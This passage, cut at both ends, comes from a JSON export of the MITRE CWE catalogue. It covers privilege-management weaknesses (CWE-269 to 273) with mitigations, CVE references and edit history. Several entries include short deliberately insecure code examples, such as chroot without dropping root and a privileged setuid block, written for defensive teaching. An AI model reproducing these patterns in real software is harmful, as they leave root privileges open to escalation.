be.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3931"},{"Reference":"CVE-2002-1981","Description":"Roles have access to dangerous procedures (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1981"},{"Reference":"CVE-2002-1671","Description":"Untrusted object/method gets access to clipboard (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1671"},{"Reference":"CVE-2000-0315","Description":"Traceroute program allows unprivileged users to modify source address of packet (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0315"},{"Reference":"CVE-2000-0506","Description":"User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0506"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Management Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"122"}},{"attr":{"@_CAPEC_ID":"233"}},{"attr":{"@_CAPEC_ID":"58"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 16: Executing Code With Too Much Privilege.&#34; Page 243"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Dropping Privileges Permanently&#34;, Page 479"}}]},"Notes":{"Note":{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"CWE Team","Modification_Date":"2008-09-08","Modification_Comment":"Moved this entry higher up in the Research view."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Privilege Management Error","attr":{"@_Date":"2008-09-09"}},{"#text":"Insecure Privilege Management","attr":{"@_Date":"2009-05-27"}}]}},"270":{"attr":{"@_ID":"270","@_Name":"Privilege Context Switching Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly manage privileges while it is switching between different contexts that have different privileges or spheres of control.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can assume the identity of another user with separate privileges in another context. This will give the user unauthorized access that may allow them to acquire the access information of other users."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1688","Description":"Web browser cross domain problem when user hits \\"back\\" button.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1688"},{"Reference":"CVE-2003-1026","Description":"Web browser cross domain problem when user hits \\"back\\" button.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1026"},{"Reference":"CVE-2002-1770","Description":"Cross-domain issue - third party product passes code to web browser, which executes it in unsafe zone.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1770"},{"Reference":"CVE-2005-2263","Description":"Run callback in different security context after it has been changed from untrusted to trusted. * note that \\"context switch before actions are completed\\" is one type of problem that happens frequently, espec. in browsers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2263"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Context Switching Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"236"}},{"attr":{"@_CAPEC_ID":"30"}},{"attr":{"@_CAPEC_ID":"35"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 7, &#34;Running with Least Privilege&#34; Page 207"}},{"attr":{"@_External_Reference_ID":"REF-76"}}]},"Notes":{"Note":{"#text":"This concept needs more study.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"271":{"attr":{"@_ID":"271","@_Name":"Privilege Dropping / Lowering Errors","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not drop privileges before passing control of a resource to an actor that does not have those privileges.","Extended_Description":"In some contexts, a system executing with elevated permissions will hand off a process/file/etc. to another process or user. If the privileges of an entity are not reduced, then elevated privileges are spread throughout a system and possibly to an attacker.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped."},{"Scope":["Access Control","Non-Repudiation"],"Impact":["Gain Privileges or Assume Identity","Hide Activities"],"Note":"If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-98"},"Intro_Text":"The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(APP_HOME);chdir(\\"/\\");FILE* data = fopen(argv[1], \\"r+\\");...","xhtml:br":["","",""]}},"Body_Text":"Constraining the process inside the application\'s home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1213","Description":"Program does not drop privileges after acquiring the raw socket.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1213"},{"Reference":"CVE-2001-0559","Description":"Setuid program does not drop privileges after a parsing error occurs, then calls another program to handle the error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0559"},{"Reference":"CVE-2001-0787","Description":"Does not drop privileges in related groups when lowering privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0787"},{"Reference":"CVE-2002-0080","Description":"Does not drop privileges in related groups when lowering privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0080"},{"Reference":"CVE-2001-1029","Description":"Does not drop privileges before determining access to certain files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1029"},{"Reference":"CVE-1999-0813","Description":"Finger daemon does not drop privileges when executing programs on behalf of the user being fingered.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0813"},{"Reference":"CVE-1999-1326","Description":"FTP server does not drop privileges if a connection is aborted during file transfer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1326"},{"Reference":"CVE-2000-0172","Description":"Program only uses seteuid to drop privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0172"},{"Reference":"CVE-2004-2504","Description":"Windows program running as SYSTEM does not drop privileges before executing other programs (many others like this, especially involving the Help facility).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2504"},{"Reference":"CVE-2004-0213","Description":"Utility Manager launches winhlp32.exe while running with raised privileges, which allows local users to gain system privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213"},{"Reference":"CVE-2004-0806","Description":"Setuid program does not drop privileges before executing program specified in an environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0806"},{"Reference":"CVE-2004-0828","Description":"Setuid program does not drop privileges before processing file specified on command line.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0828"},{"Reference":"CVE-2004-2070","Description":"Service on Windows does not drop privileges before using \\"view file\\" option, allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2070"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Dropping / Lowering Errors"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 16: Executing Code With Too Much Privilege.&#34; Page 243"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Dropping Privileges Permanently&#34;, Page 479"}}]},"Notes":{"Note":{"#text":"CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}]}},"272":{"attr":{"@_ID":"272","@_Name":"Least Privilege Violation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"271","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality"],"Impact":["Gain Privileges or Assume Identity","Read Application Data","Read Files or Directories"],"Note":"An attacker may be able to access resources with the elevated privilege that could not be accessed with the attacker\'s original privileges. This is particularly likely in conjunction with another flaw, such as a buffer overflow."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Compare binary / bytecode to application permission manifest"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Permission Manifest Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-48"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Follow the principle of least privilege when assigning access rights to entities in a software system."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"setuid(0);setuid(old_uid);","xhtml:br":["","","",""],"xhtml:i":["// Do some important stuff","// Do some non privileged stuff."]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-142"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"AccessController.doPrivileged(new PrivilegedAction() {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object run() {}","xhtml:div":{"#text":"System.loadLibrary(\\"awt\\");return null;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// privileged code goes here, for example:","// nothing to return"],"xhtml:br":["","","",""]}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-98"},"Intro_Text":"The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(APP_HOME);chdir(\\"/\\");FILE* data = fopen(argv[1], \\"r+\\");...","xhtml:br":["","",""]}},"Body_Text":"Constraining the process inside the application\'s home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Least Privilege Violation"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to drop privileges when reasonable"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS02-C","Entry_Name":"Follow the principle of least privilege"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC00-J","Entry_Name":"Do not allow privileged blocks to leak sensitive information across a trust boundary"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC01-J","Entry_Name":"Do not allow tainted variables in privileged blocks"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP36","Entry_Name":"Privilege"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":[{"#text":"CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Other"},"xhtml:p":["If system privileges are not dropped when it is reasonable to do so, this is not a vulnerability by itself. According to the principle of least privilege, access should be allowed only when it is absolutely necessary to the function of a given system, and only for the minimal necessary amount of time. Any further allowance of privilege widens the window of time during which a successful exploitation of the system will provide an attacker with that same privilege. If at all possible, limit the allowance of system privilege to small, simple sections of code that may be called atomically.","When a program calls a privileged function, such as chroot(), it must first acquire root privilege. As soon as the privileged operation has completed, the program should drop root privilege and return to the privilege level of the invoking user."]}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"273":{"attr":{"@_ID":"273","@_Name":"Improper Check for Dropped Privileges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software attempts to drop privileges but does not check or incorrectly checks to see if the drop succeeded.","Extended_Description":"If the drop fails, the software will continue to run with the raised privileges, which might provide additional access to unprivileged users.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"271","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"252","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"In Windows based environments that have access control, impersonation is used so that access checks can be performed on a client identity by a server with higher privileges. By impersonating the client, the server is restricted to client-level security -- although in different threads it may have much higher privileges."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","This issue is likely to occur in restrictive environments in which the operating system or application provides fine-grained control over privilege 